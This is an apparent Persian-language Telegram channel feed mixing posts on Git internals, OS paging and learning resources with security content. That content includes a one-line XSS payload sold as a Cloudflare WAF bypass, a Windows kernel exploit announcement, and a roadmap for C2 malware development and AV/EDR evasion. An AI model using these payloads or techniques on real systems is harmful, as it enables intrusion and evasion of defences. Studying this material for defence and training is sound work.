Stuff for Geeks
158 subscribers
181 photos
38 videos
178 files
575 links
Admin: @the_mhbr
Download Telegram
Git Object Model
با گیت احتمالا کاملا آشنا هستین ولی این بحث git object model رو شاید باهش آشنا نباشین.
اگه فرض کنیم که گیت رو توسعه دهنده با یه زبون شی گرا نوشته، git object model معنیش اینه که از چه کلاس های مهمی برای پیاده سازی این سیستم استفاده شده.

چندتا کلاس مهم و پایه که اساس و بنیان گیت رو تشکیل میدن ایناهان:
- Blob: اشیایی هستن که هر کدوم نشون دهنده یه فایل هستن

- Tree: اشیایی هستن که از چند درخت و چند بلاب دیگه تشکیل میشن. درواقع یجورایی نقش پوشه رو بازی میکنن

- Commit: اشیایی هستن که وضعیت یک درخت رو به همراه یه سری اطلاعات دیگه مثل اینکه چه کسی کامیت رو ایجاد کرده و کامیت بالاتر چی بوده رو شامل میشن

- Tag: اشیایی هستن که به یه شیی یه عدد یا اسم نسبت میدن

حالا کاری که گیت انجام میده رو شاید بهتر درک کرده باشین. فقط این اشیا رو میسازه و ذخیره میکنه. مثلا داخل پوشه
.git/objects
اطلاعات این آبجکت ها به صورت فشرده شده ذخیره میشه



این مطالب و مطالب خیلی کامل تری رو میتونین توی کتاب git community book بخونین
👍1
Forwarded from cma arasteh
سلام دوستان

من یه سری ویدیو آماده کردم ، در مورد مهندسی معکوس با استفاده از Ghidra و نوشتن اسکریپت های Ghidra ، خوشحال میشم اگه دیدید ، فیدبکی داشتید بهم بگید. 🙏


پارت چهارم:
https://youtu.be/QKXBeU0QhPk?si=pF3PCiGUGQUEY60P

پارت سوم:
https://youtu.be/gPJzdkawOmc?si=OG6JL_sVrlHSHJzq

پارت دوم:
https://youtu.be/CIN-UTQ2vPQ?si=492To5wIcL_Ugbxx

پارت اول:
https://youtu.be/uBqCnDCovH0?si=wtj0qJ5Xr9KpjHS0
Forwarded from Programmer Jokes
😁2
Forwarded from Proxy Bar
CVE-2024-21345 Windows Kernel EoP
*
WriteUp
*
exploit

#win #poc
Forwarded from PenTest Team (𝒜𝓁𝒾 🕷)
🗒 XSS Bypass Cloudflare WAF


%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E


@PenTest_Tm
Linux Privilege Escalation.pdf
1.3 MB
Linux privilege escalation

#booklet
#English
#Linux
#binary
1
اگه خواستین بفهمین کرنل لینوکس دقیقا چه مراحلی رو طی میکنه تا بوت بشه میتونین داکیومنت خود کرنل رو از لینک زیر بخونین

https://www.kernel.org/doc/html/v5.2/x86/boot.html
🔥5
شهر عجیبیه😄
🤣6
احتمالا با paging آشنا هستین. سیستم عامل یا بهتر بگیم لودرِ سیستم عامل پراسس ها رو به چندین پیج (قسمتایی به حجم معمولا ۴کیلوبایت) تقسیم میکنه و هر تعدادی که لازم داشته باشه رو لود میکنه توی مموری چون نیازی نداریم که همه پراسس همیشه توی مموری لود شده باشه.
پیج هایی هم که لازم نداشته باشیمشون توی حافظه ثانویه یا secondary storage ذخیره میشن. مبحث بسیار جالبیه این پیجینگ و کلا virtual memory که توصیه میکنم حتما بخونینش (کتابای سیستم عامل توضیح میدن یه مقدار)

سوالی که اینجا پیش میاد اینه که خب اگه ما paging داریم، پس swapping به چه کاری میاد؟؟

جواب جالبی داره.
توی paging، بخش های کوچیکی از پراسس(همون پیج ها که ۴کیلوبایتن) میرن توی حافظه ثانویه ولی توی swapping کل یه پراسس که کمتر لازمش داریم میره توی secondary storage

برای همین هم هست که معمولا اگه رمتون بزرگ باشه به swapping نیازی نخواهید داشت ولی paging همیشه و در هر صورتی نیازه👍

#OS
#Internals
🔥1
Forwarded from Security hint
networking.pdf
2.7 MB
📕اگه هنوز نمیدونی از شبکه چی بخونی این فایل برای توئه

این فایل توسط یکی از بزرگترین باگ هانتر های دنیا منتشر شده(Tomnomnom)، و خیلی کوتاه به مفاهیم اشاره کرده


#network #شبکه #resource
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
3
یه کانال خیلی خوب برای معماری کامپیوتر:
https://youtube.com/@padraicedgington901


مباحثی مثل branch prediction و stage pipeline
🔥1
It's a strange city😂😂😂😂
https://t.iss.one/stuffs_for_geeks/778
🤣3
Forwarded from Source Byte (‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌$ᴘ3ᴅʏʟ1👾)
SoheilSec :
توسعه بدافزار C2
توسعه بدافزار یکی از مهارتهایی است که برای شبیه سازی حملات APT بسیار مهم و کاربردی است

طبق MITRE attack و cyber kill chain یکی مراحل C2 است.

https://attack.mitre.org/tactics/TA0011

https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

برای توسعه بدافزار ابتدا نیازمند یادگیری یک زبان برنامه نویسی هستید، زبانی نیاز دارید که بتوانید توسط آن با win32 API کار کنید

زبان های پیشنهادی

c++

python

rust

کتاب ها:



https://t.iss.one/Peneter_Media/451

https://t.iss.one/Peneter_Media/452

https://t.iss.one/Peneter_Media/453

https://t.iss.one/Peneter_Media/454

دوره های توسعه بدافزار:

https://institute.sektor7.net/red-team-operator-malware-development-essentials

https://institute.sektor7.net/rto-maldev-intermediate

https://maldevacademy.com/

https://www.udemy.com/course/offensive-rust/

https://www.udemy.com/course/offensive-csharp/



قدم بدی نیازمند یادگیری win32 API هستید تا بتوانید

Process Manipulation, Memory Manipulation, Networking, DLL Injection

همچنین انواع تکنیک های injection یاد بگیرید:

DLL Injection, Process Hollowing, Reflective DLL Injection, Thread Injection, AtomBombing, APC Injection

لینک زیر ببینید:

https://github.com/RedTeamOperations/Advanced-Process-Injection-Workshop

c2 نیازمند یک protocol communication هست

http/https, DNS, ICMP

نیازمند یادگیری کار با Encryption

AES, XOR, RC4, RSA, ECC, ChaCha20



منابع توسعه بدافزار c2

https://pre.empt.blog/
https://shogunlab.gitbook.io/building-c2-implants-in-cpp-a-primer/
https://0xrick.github.io/misc/c2/
https://github.com/CodeXTF2/maldev-links
https://0xrick.github.io/misc/c2/
https://captmeelo.com/
https://www.vx-underground.org/#E:/root

بهترین c2 ها:

https://www.thec2matrix.com/
https://github.com/EmpireProject/Empire
https://github.com/HavocFramework/Havoc
https://github.com/cobbr/Covenant
https://github.com/Ne0nd0g/merlin
https://github.com/its-a-feature/Mythic
https://github.com/byt3bl33d3r/SILENTTRINITY
https://github.com/nettitude/PoshC2
https://github.com/BishopFox/sliver

https://github.com/rapid7/metasploit-framework

تکنیک های دور زدن می تونید از بلاگ ها و ریپوهای زیر دنبال کنید

https://github.com/boku7
https://trickster0.github.io/
https://github.com/S4ntiagoP
https://github.com/Cracked5pider
https://casvancooten.com/
https://github.com/chvancooten
https://mr.un1k0d3r.world/
https://und3rf10w.github.io/
https://github.com/waldo-irc
https://www.arashparsa.com/
https://passthehashbrowns.github.io/
https://www.wsast.co.uk/
https://gist.github.com/odzhan
https://modexp.wordpress.com/
https://fool.ish.wtf/
https://github.com/realoriginal
https://suspicious.actor/
https://github.com/moloch–
https://github.com/am0nsec
https://amonsec.net/about/
https://github.com/rasta-mouse
https://rastamouse.me/
https://github.com/xpn
https://blog.xpnsec.com/
https://github.com/sneakid
https://www.solomonsklash.io/
https://github.com/kyleavery

بعد از اینکه c2 خودتان را توسعه دهید تازه باید به دنبال دیباگ کردن و همچنین دور زدن Anti Virus و EDR باشید برای اینکار نیازمند تکنیک و ابزار Debugger هستید:

IDA Pro,OllyDbg and x64dbg,WinDbg,Ghidra,Immunity Debugger

https://t.iss.one/Peneter_Media/455

https://t.iss.one/Peneter_Media/456

https://t.iss.one/Peneter_Media/457

https://t.iss.one/Peneter_Media/458

برای دور زدن:

https://t.iss.one/Peneter_Media/444

https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass

https://medium.com/offensive-security-walk-throughs/three-techniques-for-bypassing-edr-3b4101002951

https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/

https://cydef.ca/blog/av-vs-edr-an-introduction-to-antivirus-bypass/

انتشار مقاله:

https://www.soheilsec.com/توسعه-بدافزار-c2/
سهیل هاشمی
کارشناسی ارشد شبکه | کارشناس ارشد امنیت شبکه



#c2 #malware_dev #AV
👍3
4👍1